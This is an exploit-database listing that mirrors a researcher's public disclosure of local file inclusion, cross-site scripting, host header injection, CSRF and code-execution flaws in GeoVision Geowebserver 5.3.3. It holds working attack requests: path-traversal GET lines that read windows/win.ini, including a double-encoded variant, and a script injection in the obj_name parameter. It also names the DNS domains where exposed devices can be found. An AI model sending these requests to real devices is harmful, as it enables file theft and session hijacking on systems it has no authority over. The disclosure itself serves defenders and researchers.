Exploit for GeoVision Geowebserver 5.3.3 LFI / XSS / CSRF / Code Execution

Name: Exploit for GeoVision Geowebserver 5.3.3 LFI / XSS / CSRF / Code Execution
Rating: 5 (208 reviews)
2021-08-17 | CVSS 0.0
## https://sploitus.com/exploit?id=PACKETSTORM:163860
# Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE  
# DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM  
# Date: 6-16-21 (Vendor Notified)  
# Exploit Author: Ken 's1ngular1ty' Pyle  
# Vendor Homepage: https://www.geovision.com.tw/cyber_security.php  
# Version: <= 5.3.3  
# Tested on: Windows 20XX / MULTIPLE  
# CVE : https://www.geovision.com.tw/cyber_security.php  
  
GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client side exploitation, including session theft:  
  
Nested Exploitation of the LFI, XSS, HTML / Browser Injection:  
  
GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=<script>test</script><iframe%20src=""> HTTP/1.1  
  
Absolute exploitation of the LFI:  
  
POST /Visitor/bin/WebStrings.srf?obj_name=win.ini  
  
GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini  
  
Additionally, the vendor has issued an ineffective / broken patch (https://www.geovision.com.tw/cyber_security.php) which does not appear to remediate or address the problem. Versions 5.3.3 and below continue to be affected. This is acknowledged by the vendor.  
  
  
ex. obj_name=INJECTEDHTML / XSS  
  
The application fails to properly enforce permissions and sanitize user request. This allows for LFI / Remote Code Execution through several vectors:  
  
ex. /Visitor//%252e(path to target)  
  
These vectors can be blended / nested to exfiltrate data in a nearly undetectable manner, through the API:  
  
The devices are vulnerable to HOST HEADER POISONING and CROSS-SITE REQUEST FORGERY against the web application. These can be used for various vectors of attack.  
  
These attacks were disclosed as part of the IOTVillage Presentation:  
  
https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20villages/DEFCON%2029%20IoT%20Village%20-%20Ken%20Pyle%20-%20BLUEMONDAY%20Series%20Exploitation%20and%20Mapping%20of%20Vulnerable%20Devices%20at%20Scale.mp4